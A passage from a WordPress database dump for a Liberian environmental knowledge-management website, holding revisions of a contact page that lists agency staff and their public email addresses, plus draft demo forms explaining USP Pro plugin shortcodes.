<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:57:31','2019-11-16 03:57:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2423,1,'2019-11-16 03:58:23','2019-11-16 03:58:23','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:58:23','2019-11-16 03:58:23','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2425,1,'2019-11-16 04:06:01','2019-11-16 04:06:01','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 04:06:01','2019-11-16 04:06:01','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2427,1,'2019-11-16 04:07:28','0000-00-00 00:00:00','<p>This USP Form Demo enables visitors to submit content. For a more detailed demo, check out the \"Starter Form\". To learn more about the shortcodes used in this form, <a href=\"https://plugin-planet.com/usp-pro-shortcodes/\">check out the USP Shortcode Reference</a>. Note: in order to display this form via its shortcode, the form must be published.</p>\n\n[usp_name]\n[usp_email]\n[usp_url]\n[usp_title]\n[usp_captcha]\n[usp_category]\n[usp_content]\n[usp_files]\n[usp_remember label=\"Remember Form Info\"]\n\n','USP Form Demo','','draft','closed','closed','','submit','','','2019-11-16 04:07:28','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=usp_form&p=2427',0,'usp_form','',0),(2428,1,'2019-11-16 04:35:37','0000-00-00 00:00:00','[usp_name]\n[usp_email required=\"true\"]\n[usp_subject]\n[usp_content]\n[usp_remember label=\"Remember Form Info\"]\n\n<input name=\"usp-is-contact\" type=\"hidden\" value=\"1\" />','Contact Form Demo','','draft','closed','closed','','contact','','','2019-11-16 04:35:37','2019-11-16 04:35:37','',0,'https://ekmsliberia.info/?post_type=usp_form&#038;p=2428',0,'usp_form','',0),(2429,1,'2019-11-16 04:07:28','0000-00-00 00:00:00','<p>This Registration Form Demo enables visitors to register without submitting content. For a more detailed demo, check out the \"Starter Form\". To learn more about the shortcodes used in this form, <a href=\"https://plugin-planet.com/usp-pro-shortcodes/\">check out the USP Shortcode Reference</a>. Note: in order to display this form via its shortcode, the form must be published.</p>\n\n[usp_name]\n[usp_url]\n[usp_captcha]\n[usp_email]\n\n[usp_custom_field form=\"register\" id=\"1\"]\n[usp_custom_field form=\"register\" id=\"2\"]\n[usp_custom_field form=\"register\" id=\"3\"]\n[usp_custom_field form=\"register\" id=\"4\"]\n[usp_custom_field form=\"register\" id=\"5\"]\n[usp_custom_field form=\"register\" id=\"6\"]\n[usp_remember label=\"Remember Form Info\"]\n\n<input type=\"hidden\" name=\"usp-is-register\" value=\"1\" />','User Registration Demo','','draft','closed','closed','','register','','','2019-11-16 04:07:28','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=usp_form&p=2429',0,'usp_form','',0),(2430,1,'2019-11-16 04:07:28','0000-00-00 00:00:00','<p>This Image-Preview Form Demo demonstrates how to display image previews with file uploads. For a more detailed demo, check out the \"Starter Form\". To learn more about the shortcodes used in this form, <a href=\"https://plugin-planet.com/usp-pro-shortcodes/\">check out the USP Shortcode Reference</a>. Note: in order to display this form via its shortcode, the form must be published.</p>\n\n[usp_title]\n[usp_content]\n[usp_files multiple=\"yes\" method=\"select\"]\n[usp_remember label=\"Remember Form Info\"]\n\n','Image Preview Demo','','draft','closed','closed','','preview','','','2019-11-16 04:07:28','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=usp_form&p=2430',0,'usp_form','',0),(2431,1,'2019-11-16 04:07:28','0000-00-00 00:00:00','<p>This Classic Form Demo is a replica of the form that is included with the free version of the USP plugin. For a more detailed demo, check out the \"Starter Form\". To learn more about the shortcodes used in this form, <a href=\"https://plugin-planet.com/usp-pro-shortcodes/\">check out the USP Shortcode Reference</a>. Note: in order to display this form via its shortcode, the form must be published.</p>\n\n[usp_name]\n[usp_url]\n[usp_email]\n[usp_title]\n[usp_tags required=\"false\"]\n[usp_captcha]\n[usp_category]\n[usp_content]\n[usp_files]\n[usp_remember label=\"Remember Form Info\"]\n\n\n\n','Classic Form Demo','','draft','closed','closed','','classic','','','2019-11-16 04:07:28','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=usp_form&p=2431',0,'usp_form','',0),(2432,1,'2019-11-16 04:07:28','0000-00-00 00:00:00','<p>This Starter Form Demo includes extra information to help beginners get started with creating and customizing their own forms.</p>\n\n<h2>Primary Form Fields</h2>\n\n<p>The shortcodes used to display fields in this section are referred to as \"primary fields\". Most WP themes include primary fields when they display posts on the front-end. Also, in the Admin Area, primary fields each have their own special location on the Edit Post screen. It is important to understand that primary shortcodes/fields may be used only once per form. For additional fields, like multiple content textareas, you can use Custom Fields, which are explained further along in this demo.</p>\n\n\n\n<h3>Name Field</h3>\n\n<p>The following shortcode displays the \"Name\" field when this form is viewed on the front-end of your site. You can click the Preview button to see what it looks like. Notice that we are using several attributes to customize the Name field:</p>\n\n[usp_name label=\"Name\" placeholder=\"Name\" max=\"99\" required=\"false\"]\n\n<p>The Name shortcode may be customized with various attributes, including:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-name\">Documentation for the Name shortcode and its attributes</a>.</p>\n\n<p>Note that the Name shortcode may be added to any form using the \"USP:Name\" Quicktag.</p>\n\n\n\n<h3>Title Field</h3>\n\n<p>Next up, here is the shortcode used to display the Title field:</p>\n\n[usp_title label=\"Title\" placeholder=\"Title\" max=\"99\" required=\"true\"]\n\n<p>Just like with the Name shortcode, the Title shortcode may be customized with various attributes:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-title\">Documentation for the Title shortcode and its attributes</a>.</p>\n\n<p>Note that the Title shortcode may be added to any form using the \"USP:Title\" Quicktag.</p>\n\n\n\n<h3>Tags Field</h3>\n\n<p>Here is the shortcode used to display the Tags field:</p>\n\n[usp_tags label=\"Tags\" type=\"dropdown\" multiple=\"false\" required=\"false\" include=\"all_include_empty\"]\n\n<p>Here are the attributes we are using to customize the Tags field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>type = the type of field is specified as a dropdown menu</li>\n<li>multiple = do not allow the user to select multiple tags</li>\n<li>required = whether or not the field is required</li>\n<li>include = which tags to include (overrides general setting)</li>\n</ul>\n\n<p>Note that if no tags are displayed in the Tags field, you may need to create some tags via Posts &gt; Tags. Once your site has some tags to display, you can enable them via the USP General Settings &gt; Post Tags. You can also use the \"include\" attribute to specify which tags should be included for each form.</p> \n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-tags\">Documentation for the Tags shortcode and its attributes</a>.</p>\n\n<p>Note that the Tags shortcode may be added to any form using the \"USP:Tags\" Quicktag.</p>\n\n\n\n<h3>Category Field</h3>\n\n<p>Here is the shortcode used to display the Category field:</p>\n\n[usp_category label=\"Categories\" type=\"dropdown\" multiple=\"false\" required=\"false\" include=\"all_include_empty\"]\n\n<p>Here are the attributes we are using to customize the Category field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>type = the type of field is specified as a dropdown menu</li>\n<li>multiple = do not allow the user to select multiple categories</li>\n<li>required = whether or not the field is required</li>\n<li>include = which cats to include (overrides general setting)</li>\n</ul>\n\n<p>Note that if no categories are displayed in the Category field, you may need to create some categories via Posts &gt; Categories. Once your site has some categories to display, you can enable them via the USP General Settings &gt; Post Categories. You can also use the \"include\" attribute to specify which categories should be included for each form.</p> \n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-category\">Documentation for the Category shortcode and its attributes</a>.</p>\n\n<p>Note that the Category shortcode may be added to any form using the \"USP:Category\" Quicktag.</p>\n\n\n\n<h3>Content Field</h3>\n\n<p>Here is the shortcode used to display the Content field:</p>\n\n[usp_content label=\"Content\" placeholder=\"Content\" max=\"99\" richtext=\"false\" required=\"true\"]\n\n<p>Here are the attributes we are using to customize the Content field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>richtext = indicates that the field should use the WP Rich Text Editor</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p>Remember, only one primary content field may be used per form. So if you want to add more content fields, use a Custom Field, as explained further along in the demo.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-content\">Documentation for the Content shortcode and its attributes</a>.</p>\n\n<p>Note that the Content shortcode may be added to any form using the \"USP:Content\" Quicktag.</p>\n\n\n\n<h3>Excerpt Field</h3>\n\n<p>Here is the shortcode used to display the Excerpt field:</p>\n\n[usp_excerpt label=\"Excerpt\" placeholder=\"Excerpt\" max=\"99\" richtext=\"false\" required=\"true\"]\n\n<p>Here are the attributes we are using to customize the Excerpt field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>richtext = indicates that the field should use the WP Rich Text Editor</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p>Remember, only one primary excerpt field may be used per form. So if you want to add more excerpt fields, use a Custom Field, as explained further along in the demo.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-excerpt\">Documentation for the Excerpt shortcode and its attributes</a>.</p>\n\n<p>Note that the Excerpt shortcode may be added to any form using the \"USP:Excerpt\" Quicktag.</p>\n\n\n\n<h2>Secondary Fields</h2>\n\n<p>The shortcodes provided in this section display secondary fields. Secondary fields are used to collect data such as URL, Email, Files, Taxonomy, and more. Secondary fields actually are Custom Fields that have their own Quicktags to make them easier to add to forms. If your form includes any secondary fields, they may be viewed in the Custom Fields panel located on the \"Edit Post\" screen for each submitted post. As with primary fields, secondary fields may be included only once per form.</p>\n\n\n\n<h3>URL Field</h3>\n\n<p>Here is the shortcode used to display the URL field:</p>\n\n[usp_url label=\"URL\" placeholder=\"URL\" required=\"false\"]\n\n<p>Here are the attributes we are using to customize the URL field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-url\">Documentation for the URL shortcode and its attributes</a>.</p>\n\n<p>Note that the URL shortcode may be added to any form using the \"USP:URL\" Quicktag.</p>\n\n\n\n<h3>Email Field</h3>\n\n<p>Here is the shortcode used to display the Email field:</p>\n\n[usp_email label=\"Email\" placeholder=\"Email\" max=\"99\" required=\"false\"]\n\n<p>Here are the attributes we are using to customize the Email field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-email\">Documentation for the Email shortcode and its attributes</a>.</p>\n\n<p>Note that the Email shortcode may be added to any form using the \"USP:Email\" Quicktag.</p>\n\n\n\n<h3>Subject Field</h3>\n\n<p>When included in a Contact Form, the Subject field is used as the email subject. Here is the shortcode:</p>\n\n[usp_subject label=\"Subject\" placeholder=\"Subject\" max=\"99\" required=\"false\"]\n\n<p>Here are the attributes we are using to customize the Subject field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>max = the maximum number of characters allowed for the field</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-subject\">Documentation for the Subject shortcode and its attributes</a>.</p>\n\n<p>Note that the Subject shortcode may be added to any form using the \"USP:Subject\" Quicktag.</p>\n\n\n\n<h3>Taxonomy Field</h3>\n\n<p>If your theme supports any Custom Taxonomies, you can use this shortcode to include a Taxonomy field in your form:</p>\n\n[usp_taxonomy label=\"People\" tax=\"people\" terms=\"all_include_empty\" type=\"dropdown\" multiple=\"true\" required=\"false\"]\n\n<p>Here are the attributes we are using to customize the Taxonomy field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>tax = the name of the taxonomy</li>\n<li>terms = the term IDs to be included in the field</li>\n<li>type = the type of field is specified as a dropdown menu</li>\n<li>multiple = allow the user to select multiple categories</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p>The trick for this tag is making sure to include the taxonomy name for the \"tax\" attribute, and the taxonomy term IDs in the \"terms\" attribute. So, if the previous shortcode/field is displaying \"No terms found for people\", it means that the \"people\" taxonomy is not supported by your theme. Tip: to include all tax terms automatically, use \"all\" as the value for \"terms\" (e.g., terms=\"all\"). Check out the Taxonomy Shortcode reference for more useful attributes and tricks.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#custom-taxonomy\">Documentation for the Taxonomy shortcode and its attributes</a>.</p>\n\n<p>Note that the Taxonomy shortcode may be added to any form using the \"USP:Taxonomy\" Quicktag.</p>\n\n\n\n<h3>Files Field</h3>\n\n<p>The Files shortcode displays a Files field that enables the user to upload files. Here is the shortcode:</p>\n\n[usp_files label=\"Files\" placeholder=\"Files\" types=\"gif,jpg,png\" multiple=\"true\" method=\"select\" required=\"false\"]\n\n<p>Here are the attributes we are using to customize the Files field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>types = allow only gif, jpg, and png file types</li>\n<li>multiple = whether to allow user to select multiple files</li>\n<li>method = method of selecting multiple files</li>\n<li>required = whether or not the field is required</li>\n</ul>\n\n<p>For the allowed file types, you can <a href=\"https://plugin-planet.com/usp-pro-allowed-file-types/\">specify global and local types</a>. To customize other global options, you can visit the USP Uploads settings. Then to override the global settings for each form , you can use attributes such as \"files_min\", \"files_max\", and many others. Also, each form may include only one Files shortcode, but you can <a href=\"https://plugin-planet.com/usp-pro-multiple-file-upload-fields/\">use Custom Fields to add multiple Files/upload fields</a>.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-files\">Documentation for the Files shortcode and its attributes</a>.</p>\n\n<p>Note that the Files shortcode may be added to any form using the \"USP:Files\" Quicktag.</p>\n\n\n\n<h3>Captcha</h3>\n\n<p>To protect the form from spammers, we add a captcha field. Here is the shortcode:</p>\n\n[usp_captcha]\n\n<p>Note that the label and placeholder are determined automatically, based on the value of the plugin option, \"Antispam/Captcha\", which is located under the General settings tab.</p>\n\n<p>Instead of using the default challenge question/answer for the captcha, we can <a href=\"https://plugin-planet.com/usp-pro-add-google-recaptcha/\">enable Google reCaptcha</a>.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#usp-captcha\">Documentation for the Captcha shortcode and its attributes</a>.</p>\n\n<p>Note that the Agree to Terms shortcode may be added to any form using the \"USP:Captcha\" Quicktag.</p>\n\n\n\n<h3>Agree to Terms</h3>\n\n<p>The \"Agree to Terms\" field actually is a checkbox field that is associated with a toggling \"terms\" box. To include it, add the following shortcode:</p>\n\n[usp_agree label=\"Agree to Terms\" toggle=\"Toggle Terms\" terms=\"Put your terms here..\" alert=\"\"]\n\n<p>Here are the attributes we are using to customize the Agree field:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>toggle = the text used for the toggle link</li>\n<li>terms = the terms displayed in the toggle box</li>\n<li>alert = the text displayed in the popup alert (leave blank to disable)</li>\n</ul>\n\n<p>For more attributes, <a href=\"https://plugin-planet.com/usp-pro-agree-to-terms-box/\">check out the \"Add an Agree to Terms Box\" tutorial</a> at Plugin Planet. Note that the USP Pro JavaScript must be enabled for this shortcode to work.</p>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-shortcodes/#agree-terms\">Documentation for the Agree to Terms shortcode and its attributes</a>.</p>\n\n<p>Note that the Agree to Terms shortcode may be added to any form using the \"USP:Agree\" Quicktag.</p>\n\n\n\n<h2>Custom Fields</h2>\n\n<p>In USP Pro, <a href=\"https://plugin-planet.com/usp-pro-custom-fields/\">Custom Fields</a> are used to add virtually any type of fields to USP Forms. We have seen several Custom Fields already in this Starter Form, including the URL, Email, and Subject fields. Custom Fields may be used to add other types of fields, such as textareas, select fields, radio fields, checkboxes, and text fields. Here is a <a href=\"https://plugin-planet.com/usp-pro-shortcodes/#custom-fields\">list of all attributes for the Custom Field shortcode</a>.</p>\n\n\n\n<h3>Checkboxes</h3>\n\n<p>To add a custom checkbox field, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a checkboxes field already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>field#input_checkbox|checkboxes#Option 1:Option 2:Option 3|checkboxes_checked#Option 1|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"1\"]\n\n<p>Including that shortcode in the form results in the display of a checkbox field, as defined by its attributes:</p>\n\n<ul>\n<li>field = the type of field</li>\n<li>desc = description/label for the group of checkboxes</li>\n<li>checkboxes = the options for the checkbox, separated by a colon :</li>\n<li>checkboxes_checked = the option that should be checked by default</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-custom-checkbox-fields/\">Learn more about custom checkbox fields</a>.</p>\n\n\n\n<h3>Radio Field</h3>\n\n<p>To add a custom radio 